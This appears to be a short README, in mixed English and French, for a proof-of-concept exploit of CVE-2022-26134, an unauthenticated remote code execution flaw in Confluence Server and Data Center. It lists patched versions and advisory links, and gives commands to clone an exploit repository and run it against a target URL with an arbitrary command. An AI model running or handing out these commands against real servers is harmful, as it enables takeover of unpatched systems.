
Confluence Server and Data Center - CVE-2022-26134 - Critical severity unauthenticated remote code execution vulnerability PoC
Confluence Server et Data Center - CVE-2022-26134 - Preuve de concept de vulnérabilité d'exécution de code à distance non authentifiée de sévérité critique

Atlassian considère le niveau de sévérité de cette vulnérabilité comme critique, selon l'échelle publiée dans les niveaux de sévérité d'Atlassian. Toutes les versions de Confluence Server et Data Center antérieures aux versions corrigées listées ci-dessus sont affectées par cette vulnérabilité.
Les versions publiées 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 et 7.18.1 contiennent un correctif pour ce problème.
git clone https://github.com/shamo0/CVE-2022-26134.git
cd CVE-2022-26134
python3 exploit.py https://target.com CMD
https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
https://github.com/Nwqda/CVE-2022-26134
https://jira.atlassian.com/browse/CONFSERVER-79016
https://bugalert.org/content/notices/2022-06-02-confluence.html